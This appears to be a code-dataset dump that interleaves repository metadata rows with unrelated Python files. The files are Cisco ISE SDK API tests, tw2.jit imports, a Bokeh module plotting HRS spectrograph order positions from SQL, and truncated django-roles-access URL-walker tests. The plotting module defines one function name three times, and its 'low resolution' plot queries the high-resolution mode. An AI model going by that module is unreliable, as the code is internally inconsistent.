"MIT"
] | 2 |
2022-02-11T04:39:21.000Z
|
2022-02-12T15:50:35.000Z
|
matrix/__init__.py
|
AbhiK002/Matrix
|
2d83f08877dccba9e4c710bd5fb65f613848d63f
|
[
"MIT"
] | null | null | null |
matrix/__init__.py
|
AbhiK002/Matrix
|
2d83f08877dccba9e4c710bd5fb65f613848d63f
|
[
"MIT"
] | null | null | null |
from .main import Matrix
| 12.5 | 24 | 0.8 | 4 | 25 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
4c6a77a19021a586afe308be8abcbb50f2c090fd
| 26 |
py
|
Python
|
projects/django-filer/test.py
|
fleimgruber/python
|
2e735762c73651cffc027ca850b2a58d87d54b49
|
[
"Unlicense"
] | 25 |
2021-10-30T19:54:59.000Z
|
2022-03-29T06:11:02.000Z
|
projects/django-filer/test.py
|
fleimgruber/python
|
2e735762c73651cffc027ca850b2a58d87d54b49
|
[
"Unlicense"
] | 21 |
2021-10-19T01:09:38.000Z
|
2022-03-24T16:08:53.000Z
|
projects/django-filer/test.py
|
fleimgruber/python
|
2e735762c73651cffc027ca850b2a58d87d54b49
|
[
"Unlicense"
] | 3 |
2022-01-25T20:25:13.000Z
|
2022-03-08T02:58:50.000Z
|
import filer
import tests
| 8.666667 | 12 | 0.846154 | 4 | 26 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 26 | 2 | 13 | 13 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
d5deac526ab7e57ca5c90998d8462e6ef3d52eff
| 350 |
py
|
Python
|
tw2/jit/widgets/__init__.py
|
toscawidgets/tw2.jit
|
c5e8059975115385f225029ba5c7380673524122
|
[
"MIT"
] | 1 |
2020-01-12T05:11:24.000Z
|
2020-01-12T05:11:24.000Z
|
tw2/jit/widgets/__init__.py
|
toscawidgets/tw2.jit
|
c5e8059975115385f225029ba5c7380673524122
|
[
"MIT"
] | null | null | null |
tw2/jit/widgets/__init__.py
|
toscawidgets/tw2.jit
|
c5e8059975115385f225029ba5c7380673524122
|
[
"MIT"
] | null | null | null |
from tw2.jit.widgets.chart import (AreaChart, BarChart, PieChart)
from tw2.jit.widgets.graph import (ForceDirectedGraph, RadialGraph)
from tw2.jit.widgets.tree import (SpaceTree, HyperTree, Sunburst,
Icicle, TreeMap)
from tw2.jit.widgets.ajax import AjaxRadialGraph
from tw2.jit.widgets.sqla import SQLARadialGraph
| 43.75 | 67 | 0.742857 | 42 | 350 | 6.190476 | 0.52381 | 0.134615 | 0.192308 | 0.326923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017361 | 0.177143 | 350 | 7 | 68 | 50 | 0.885417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.833333 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
d5f5577604a264eefbdbdf102a315e607e68f2da
| 15,156 |
py
|
Python
|
tests/api/v3_1_0/test_security_groups_acls.py
|
CiscoISE/ciscoisesdk
|
860b0fc7cc15d0c2a39c64608195a7ab3d5f4885
|
[
"MIT"
] | 36 |
2021-05-18T16:24:19.000Z
|
2022-03-05T13:44:41.000Z
|
tests/api/v3_1_0/test_security_groups_acls.py
|
CiscoISE/ciscoisesdk
|
860b0fc7cc15d0c2a39c64608195a7ab3d5f4885
|
[
"MIT"
] | 15 |
2021-06-08T19:03:37.000Z
|
2022-02-25T14:47:33.000Z
|
tests/api/v3_1_0/test_security_groups_acls.py
|
CiscoISE/ciscoisesdk
|
860b0fc7cc15d0c2a39c64608195a7ab3d5f4885
|
[
"MIT"
] | 6 |
2021-06-10T09:32:01.000Z
|
2022-01-12T08:34:39.000Z
|
# -*- coding: utf-8 -*-
"""IdentityServicesEngineAPI security_groups_acls API fixtures and tests.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import pytest
from fastjsonschema.exceptions import JsonSchemaException
from ciscoisesdk.exceptions import MalformedRequest
from ciscoisesdk.exceptions import ciscoisesdkException
from tests.environment import IDENTITY_SERVICES_ENGINE_VERSION
pytestmark = pytest.mark.skipif(IDENTITY_SERVICES_ENGINE_VERSION != '3.1.0', reason='version does not match')
def is_valid_get_security_groups_acl_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_a50d1bd34d5f593aadf8eb02083c67b0_v3_1_0').validate(obj.response)
return True
def get_security_groups_acl_by_id(api):
endpoint_result = api.security_groups_acls.get_security_groups_acl_by_id(
id='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_get_security_groups_acl_by_id(api, validator):
try:
assert is_valid_get_security_groups_acl_by_id(
validator,
get_security_groups_acl_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def get_security_groups_acl_by_id_default(api):
endpoint_result = api.security_groups_acls.get_security_groups_acl_by_id(
id='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_get_security_groups_acl_by_id_default(api, validator):
try:
assert is_valid_get_security_groups_acl_by_id(
validator,
get_security_groups_acl_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_update_security_groups_acl_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_afc81cd1e25c50319f75606b97c23b3d_v3_1_0').validate(obj.response)
return True
def update_security_groups_acl_by_id(api):
endpoint_result = api.security_groups_acls.update_security_groups_acl_by_id(
aclcontent='string',
active_validation=False,
description='string',
generation_id='string',
id='string',
ip_version='string',
is_read_only=True,
modelled_content={},
name='string',
payload=None
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_update_security_groups_acl_by_id(api, validator):
try:
assert is_valid_update_security_groups_acl_by_id(
validator,
update_security_groups_acl_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def update_security_groups_acl_by_id_default(api):
endpoint_result = api.security_groups_acls.update_security_groups_acl_by_id(
active_validation=False,
id='string',
aclcontent=None,
description=None,
generation_id=None,
ip_version=None,
is_read_only=None,
modelled_content=None,
name=None,
payload=None
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_update_security_groups_acl_by_id_default(api, validator):
try:
assert is_valid_update_security_groups_acl_by_id(
validator,
update_security_groups_acl_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_delete_security_groups_acl_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_b0a2bea8bfec52b68663ef3f7ac6d7a7_v3_1_0').validate(obj.response)
return True
def delete_security_groups_acl_by_id(api):
endpoint_result = api.security_groups_acls.delete_security_groups_acl_by_id(
id='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_delete_security_groups_acl_by_id(api, validator):
try:
assert is_valid_delete_security_groups_acl_by_id(
validator,
delete_security_groups_acl_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def delete_security_groups_acl_by_id_default(api):
endpoint_result = api.security_groups_acls.delete_security_groups_acl_by_id(
id='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_delete_security_groups_acl_by_id_default(api, validator):
try:
assert is_valid_delete_security_groups_acl_by_id(
validator,
delete_security_groups_acl_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_get_security_groups_acl(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_999b22d6ad9f595ab7e3eee5cf44de8a_v3_1_0').validate(obj.response)
return True
def get_security_groups_acl(api):
endpoint_result = api.security_groups_acls.get_security_groups_acl(
filter='value1,value2',
filter_type='string',
page=0,
size=0,
sortasc='string',
sortdsc='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_get_security_groups_acl(api, validator):
try:
assert is_valid_get_security_groups_acl(
validator,
get_security_groups_acl(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def get_security_groups_acl_default(api):
endpoint_result = api.security_groups_acls.get_security_groups_acl(
filter=None,
filter_type=None,
page=None,
size=None,
sortasc=None,
sortdsc=None
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_get_security_groups_acl_default(api, validator):
try:
assert is_valid_get_security_groups_acl(
validator,
get_security_groups_acl_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_create_security_groups_acl(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_9ab61f24bdaf508590f7686e1130913f_v3_1_0').validate(obj.response)
return True
def create_security_groups_acl(api):
endpoint_result = api.security_groups_acls.create_security_groups_acl(
aclcontent='string',
active_validation=False,
description='string',
generation_id='string',
ip_version='string',
is_read_only=True,
modelled_content={},
name='string',
payload=None
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_create_security_groups_acl(api, validator):
try:
assert is_valid_create_security_groups_acl(
validator,
create_security_groups_acl(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def create_security_groups_acl_default(api):
endpoint_result = api.security_groups_acls.create_security_groups_acl(
active_validation=False,
aclcontent=None,
description=None,
generation_id=None,
ip_version=None,
is_read_only=None,
modelled_content=None,
name=None,
payload=None
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_create_security_groups_acl_default(api, validator):
try:
assert is_valid_create_security_groups_acl(
validator,
create_security_groups_acl_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_get_version(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_6704e67a1131578aa794d8377da9a1de_v3_1_0').validate(obj.response)
return True
def get_version(api):
endpoint_result = api.security_groups_acls.get_version(
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_get_version(api, validator):
try:
assert is_valid_get_version(
validator,
get_version(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def get_version_default(api):
endpoint_result = api.security_groups_acls.get_version(
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_get_version_default(api, validator):
try:
assert is_valid_get_version(
validator,
get_version_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_bulk_request_for_security_groups_acl(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_7da250e23ac05e6a8dcf32a81effcee9_v3_1_0').validate(obj.response)
return True
def bulk_request_for_security_groups_acl(api):
endpoint_result = api.security_groups_acls.bulk_request_for_security_groups_acl(
active_validation=False,
operation_type='string',
payload=None,
resource_media_type='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_bulk_request_for_security_groups_acl(api, validator):
try:
assert is_valid_bulk_request_for_security_groups_acl(
validator,
bulk_request_for_security_groups_acl(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def bulk_request_for_security_groups_acl_default(api):
endpoint_result = api.security_groups_acls.bulk_request_for_security_groups_acl(
active_validation=False,
operation_type=None,
payload=None,
resource_media_type=None
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_bulk_request_for_security_groups_acl_default(api, validator):
try:
assert is_valid_bulk_request_for_security_groups_acl(
validator,
bulk_request_for_security_groups_acl_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_monitor_bulk_status_security_groups_acl(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_07af5ee576605a5a915d888924c1e804_v3_1_0').validate(obj.response)
return True
def monitor_bulk_status_security_groups_acl(api):
endpoint_result = api.security_groups_acls.monitor_bulk_status_security_groups_acl(
bulkid='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_monitor_bulk_status_security_groups_acl(api, validator):
try:
assert is_valid_monitor_bulk_status_security_groups_acl(
validator,
monitor_bulk_status_security_groups_acl(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print("ERROR: {error}".format(error=original_e))
raise original_e
def monitor_bulk_status_security_groups_acl_default(api):
endpoint_result = api.security_groups_acls.monitor_bulk_status_security_groups_acl(
bulkid='string'
)
return endpoint_result
@pytest.mark.security_groups_acls
def test_monitor_bulk_status_security_groups_acl_default(api, validator):
try:
assert is_valid_monitor_bulk_status_security_groups_acl(
validator,
monitor_bulk_status_security_groups_acl_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
| 31.509356 | 109 | 0.720375 | 1,864 | 15,156 | 5.491416 | 0.110515 | 0.150449 | 0.127882 | 0.061254 | 0.837632 | 0.831575 | 0.828351 | 0.823857 | 0.813794 | 0.795526 | 0 | 0.015608 | 0.209488 | 15,156 | 480 | 110 | 31.575 | 0.838745 | 0.076933 | 0 | 0.684492 | 0 | 0 | 0.060216 | 0.024601 | 0 | 0 | 0 | 0 | 0.128342 | 1 | 0.106952 | false | 0 | 0.013369 | 0 | 0.205882 | 0.02139 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
d5f67147c5059c64bf2090a7f0dd93d9aec0092b
| 9,842 |
py
|
Python
|
app/main/pages/instrument/hrs/red/order/plots.py
|
hettlage/salt-data-quality-site
|
da9ff4a51e8affa47e0bc1c0383c7fdeaac2155e
|
[
"MIT"
] | null | null | null |
app/main/pages/instrument/hrs/red/order/plots.py
|
hettlage/salt-data-quality-site
|
da9ff4a51e8affa47e0bc1c0383c7fdeaac2155e
|
[
"MIT"
] | null | null | null |
app/main/pages/instrument/hrs/red/order/plots.py
|
hettlage/salt-data-quality-site
|
da9ff4a51e8affa47e0bc1c0383c7fdeaac2155e
|
[
"MIT"
] | null | null | null |
import pandas as pd
from bokeh.models import HoverTool
from bokeh.models.formatters import DatetimeTickFormatter
from bokeh.palettes import Plasma256
from bokeh.plotting import figure, ColumnDataSource
from app import db
from app.decorators import data_quality
# creates your plot
date_formatter = DatetimeTickFormatter(microseconds=['%f'],
milliseconds=['%S.%2Ns'],
seconds=[':%Ss'],
minsec=[':%Mm:%Ss'],
minutes=['%H:%M:%S'],
hourmin=['%H:%M:'],
hours=["%H:%M"],
days=["%d %b"],
months=["%d %b %Y"],
years=["%b %Y"])
def get_position_source(start_date, end_date, obsmode):
logic = " and HrsMode_Id = {obsmode} " \
" and FileName like 'RORDER%%' " \
.format(obsmode=obsmode)
sql = "select Date, y_upper, HrsOrder, CONVERT(Date,char) AS Time " \
" from DQ_HrsOrder join NightInfo using (NightInfo_Id) " \
" where Date > '{start_date}' and Date <'{end_date}' {logic}" \
.format(start_date=start_date, end_date=end_date, logic=logic)
df = pd.read_sql(sql, db.engine)
colors = []
if len(df) > 0:
ord_min = df['HrsOrder'].min()
ord_max = df['HrsOrder'].max()
colors = [Plasma256[int((y - ord_min) * (len(Plasma256) - 1) / float(ord_max - ord_min))] for y in
df["HrsOrder"]]
df['colors'] = colors
source = ColumnDataSource(df)
return source
@data_quality(name='hrs_order', caption='HRS Order')
def hrs_order_plot(start_date, end_date):
"""Return a <div> element with the Order plot.
The plot shows the HRS order for obsmode High, low and medium over time
Params:
-------
start_date: date
Earliest date to include in the plot.
end_date: date
Earliest date not to include in the plot.
Return:
-------
str:
A <div> element with the Order plot.
"""
def get_source(obsmode):
logic = " and HrsMode_Id = {obsmode} " \
" and FileName like 'RORDER%%' " \
" group by Date " \
.format(obsmode=obsmode)
sql = "select Date, (Max(HrsOrder) - Min(HrsOrder)) as ord, CONVERT(Date, char) AS Time " \
" from DQ_HrsOrder join NightInfo using (NightInfo_Id) " \
" where Date > '{start_date}' and Date <'{end_date}' {logic}" \
.format(start_date=start_date, end_date=end_date, logic=logic)
df = pd.read_sql(sql, db.engine)
source = ColumnDataSource(df)
return source
low_source = get_source(1) # HrsMode_Id = 1 low
med_source = get_source(2) # HrsMode_Id = 2 med
high_source = get_source(3) # HrsMode_Id = 3 high
tool_list = "pan,reset,save,wheel_zoom, box_zoom"
_hover = HoverTool(
tooltips="""
<div>
<div>
<span style="font-size: 15px; font-weight: bold;">Date: </span>
<span style="font-size: 15px;"> @Time</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">HrsOrder(Max - Min): </span>
<span style="font-size: 15px;"> @ord</span>
</div>
</div>
"""
)
p = figure(title="HRS Order",
x_axis_label='Date',
y_axis_label='Max(HrsOrder) - Min(HrsOrder)',
x_axis_type='datetime',
tools=[tool_list, _hover])
p.scatter(source=low_source, x='Date', y='ord', color='red', fill_alpha=0.2, legend='Low', size=10)
p.scatter(source=med_source, x='Date', y='ord', color='orange', fill_alpha=0.2, legend='Medium', size=10)
p.scatter(source=high_source, x='Date', y='ord', color='green', fill_alpha=0.2, legend='High', size=10)
p.legend.location = "top_right"
p.legend.click_policy = "hide"
p.legend.background_fill_alpha = 0.3
p.legend.inactive_fill_alpha = 0.8
p.xaxis[0].formatter = date_formatter
return p
@data_quality(name='hrs_order_position_high', caption=' ')
def hrs_order_position_plot(start_date, end_date):
"""
Return a <div> element with the Order Position plot.
The plot shows the HRS order for obsmode High resolution over time
Params:
-------
start_date: date
Earliest date to include in the plot.
end_date: date
Earliest date not to include in the plot.
Return:
-------
str:
A <div> element with the Order Position plot.
"""
high_source = get_position_source(start_date, end_date, 3) # HrsMode_Id = 3 high
tool_list = "pan,reset,save,wheel_zoom, box_zoom"
_hover = HoverTool(
tooltips="""
<div>
<div>
<span style="font-size: 15px; font-weight: bold;">Date: </span>
<span style="font-size: 15px;"> @Time</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">Y Upper: </span>
<span style="font-size: 15px;"> @y_upper</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">HRS Order: </span>
<span style="font-size: 15px;"> @HrsOrder</span>
</div>
</div>
"""
)
p = figure(title="HRS Order Position High Resolution",
x_axis_label='Date',
y_axis_label='y_upper',
x_axis_type='datetime',
tools=[tool_list, _hover])
p.scatter(source=high_source, x='Date', y='y_upper', color='colors', fill_alpha=0.2, size=10)
p.xaxis[0].formatter = date_formatter
return p
@data_quality(name='hrs_order_position_medium', caption=' ')
def hrs_order_position_plot(start_date, end_date):
"""
Return a <div> element with the Order Position plot.
The plot shows the HRS order for obsmode High resolution over time
Params:
-------
start_date: date
Earliest date to include in the plot.
end_date: date
Earliest date not to include in the plot.
Return:
-------
str:
A <div> element with the Order Position plot.
"""
high_source = get_position_source(start_date, end_date, 2) # HrsMode_Id = 3 high
tool_list = "pan,reset,save,wheel_zoom, box_zoom"
_hover = HoverTool(
tooltips="""
<div>
<div>
<span style="font-size: 15px; font-weight: bold;">Date: </span>
<span style="font-size: 15px;"> @Time</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">Y Upper: </span>
<span style="font-size: 15px;"> @y_upper</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">HRS Order: </span>
<span style="font-size: 15px;"> @HrsOrder</span>
</div>
</div>
"""
)
p = figure(title="HRS Order Position Medium Resolution",
x_axis_label='Date',
y_axis_label='y_upper',
x_axis_type='datetime',
tools=[tool_list, _hover])
p.scatter(source=high_source, x='Date', y='y_upper', color='colors', fill_alpha=0.2, size=10)
p.xaxis[0].formatter = date_formatter
return p
@data_quality(name='hrs_order_position_low', caption=' ')
def hrs_order_position_plot(start_date, end_date):
"""
Return a <div> element with the Order Position plot.
The plot shows the HRS order for obsmode High resolution over time
Params:
-------
start_date: date
Earliest date to include in the plot.
end_date: date
Earliest date not to include in the plot.
Return:
-------
str:
A <div> element with the Order Position plot.
"""
high_source = get_position_source(start_date, end_date, 3) # HrsMode_Id = 3 high
tool_list = "pan,reset,save,wheel_zoom, box_zoom"
_hover = HoverTool(
tooltips="""
<div>
<div>
<span style="font-size: 15px; font-weight: bold;">Date: </span>
<span style="font-size: 15px;"> @Time</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">Y Upper: </span>
<span style="font-size: 15px;"> @y_upper</span>
</div>
<div>
<span style="font-size: 15px; font-weight: bold;">HRS Order: </span>
<span style="font-size: 15px;"> @HrsOrder</span>
</div>
</div>
"""
)
p = figure(title="HRS Order Position Low Resolution",
x_axis_label='Date',
y_axis_label='y_upper',
x_axis_type='datetime',
tools=[tool_list, _hover])
p.scatter(source=high_source, x='Date', y='y_upper', color='colors', fill_alpha=0.2, size=10)
p.xaxis[0].formatter = date_formatter
return p
| 35.530686 | 109 | 0.517984 | 1,144 | 9,842 | 4.298951 | 0.138112 | 0.04026 | 0.058154 | 0.076047 | 0.817405 | 0.782432 | 0.754168 | 0.741765 | 0.729565 | 0.729565 | 0 | 0.01578 | 0.356127 | 9,842 | 277 | 110 | 35.530686 | 0.760297 | 0.146617 | 0 | 0.672515 | 0 | 0.070175 | 0.471564 | 0.021701 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035088 | false | 0 | 0.040936 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
e6783e2d5b99dd220ab72c9c82dce296b3c378e7
| 49,475 |
py
|
Python
|
tests/test_utils.py
|
django-roles-access/master
|
066d0d6b99b986eacc736e6973b415cbb9172d46
|
[
"MIT"
] | 5 |
2019-03-22T08:08:25.000Z
|
2019-04-11T11:46:52.000Z
|
tests/test_utils.py
|
django-roles-access/master
|
066d0d6b99b986eacc736e6973b415cbb9172d46
|
[
"MIT"
] | 5 |
2019-04-03T21:53:52.000Z
|
2019-05-22T22:41:34.000Z
|
tests/test_utils.py
|
django-roles-access/master
|
066d0d6b99b986eacc736e6973b415cbb9172d46
|
[
"MIT"
] | null | null | null |
from importlib import import_module
from unittest import TestCase as UnitTestCase
from django.contrib.auth.models import Group
from django.core.management import BaseCommand
from django.conf import settings
from django.test import TestCase
from django.views.generic import TemplateView
try:
from unittest.mock import Mock, patch, MagicMock
except:
from mock import Mock, patch
from django_roles_access.decorator import access_by_role
from django_roles_access.mixin import RolesMixin
from django_roles_access.models import ViewAccess
from tests import views
from django_roles_access.utils import (walk_site_url, get_views_by_app,
view_access_analyzer,
get_view_analyze_report,
check_django_roles_is_used,
analyze_by_role, APP_NAME_FOR_NONE,
NOT_SECURED_DEFAULT, SECURED_DEFAULT,
PUBLIC_DEFAULT, NONE_TYPE_DEFAULT,
DISABLED_DEFAULT, OutputReport)
class MockRegex:
def __init__(self):
self.pattern = '^fake-regex-pattern/$'
class MockRegexResolver:
def __init__(self):
self.pattern = '^fake-resolver/'
class MockRegexResolverNested:
def __init__(self):
self.pattern = '^fake-nested-resolver/'
class MockPattern:
def __init__(self):
self.regex = MockRegex()
self.callback = 'fake-callback'
self.name = 'fake-view-name'
class MockResolver:
def __init__(self):
self.url_patterns = [MockPattern()]
self.regex = MockRegexResolver()
self.app_name = 'fake-app-name'
self.namespace = 'fake-namespace'
class MockResolverNested:
def __init__(self):
self.url_patterns = [MockResolver()]
self.regex = MockRegexResolverNested()
self.app_name = 'fake-app-name'
self.namespace = 'nested-namespace'
class MockPatternDjango2:
def __init__(self):
self.pattern = '^fake-pattern/'
self.callback = 'fake-callback'
self.name = 'fake-view-name'
class MockPatternDjango2None:
def __init__(self):
self.pattern = '^fake-pattern/'
self.callback = 'fake-callback'
self.name = 'fake-view-none'
class MockResolverDjango2:
def __init__(self):
self.pattern = '^fake-resolver/'
self.url_patterns = [MockPatternDjango2()]
self.app_name = 'fake-app-name'
self.namespace = 'fake-namespace'
class MockResolverDjango2None:
def __init__(self):
self.pattern = '^fake-resolver/'
self.url_patterns = [MockPatternDjango2None()]
self.app_name = None
self.namespace = None
class MockResolverDjango2None2:
def __init__(self):
self.pattern = '^fake-resolver/'
self.url_patterns = [MockResolverDjango2None()]
self.app_name = 'fake-app-name'
self.namespace = 'fake-namespace'
class MockResolverDjangoNested:
def __init__(self):
self.pattern = '^fake-nested-resolver/'
self.url_patterns = [MockResolverDjango2()]
self.app_name = 'fake-app-name'
self.namespace = 'nested-namespace'
class UnitTestWalkSiteURL(UnitTestCase):
def setUp(self):
self.pattern_1 = MockPattern()
self.data = [self.pattern_1]
def test_second_param_is_optional_return_a_list(self):
result = walk_site_url(self.data)
self.assertIsInstance(result, list)
def test_first_param_list_of_pattern_and_view(self):
result = walk_site_url(self.data)
self.assertEqual(result, [('fake-regex-pattern/', 'fake-callback',
'fake-view-name', None)])
def test_first_param_list_of_patterns_and_views(self):
pattern_2 = MockPattern()
pattern_2.regex.pattern = 'fake-regex-pattern-2/'
pattern_2.callback = 'fake-view-2'
result = walk_site_url([self.pattern_1, pattern_2])
self.assertEqual(result, [('fake-regex-pattern/', 'fake-callback',
'fake-view-name', None),
('fake-regex-pattern-2/', 'fake-view-2',
'fake-view-name', None)])
def test_param_list_with_pattern_and_resolver_django_1(self):
expected_result = [
('fake-regex-pattern/', 'fake-callback', 'fake-view-name', None),
('fake-resolver/fake-regex-pattern/',
'fake-callback', 'fake-namespace:fake-view-name', 'fake-app-name'
)]
resolver = MockResolver()
result = walk_site_url([self.pattern_1, resolver])
self.assertEqual(result, expected_result)
def test_param_list_with_pattern_and_nested_resolver_django_1(self):
expected_result = [
('fake-regex-pattern/', 'fake-callback', 'fake-view-name', None),
('fake-nested-resolver/fake-resolver/fake-regex-pattern/',
'fake-callback', 'nested-namespace:fake-namespace:fake-view-name',
'fake-app-name'
)
]
resolver = MockResolverNested()
result = walk_site_url([self.pattern_1, resolver])
self.assertEqual(result, expected_result)
def test_param_list_with_pattern_and_resolver_django_2(self):
expected_result = [
('fake-pattern/', 'fake-callback', 'fake-view-name', None),
('fake-resolver/fake-pattern/',
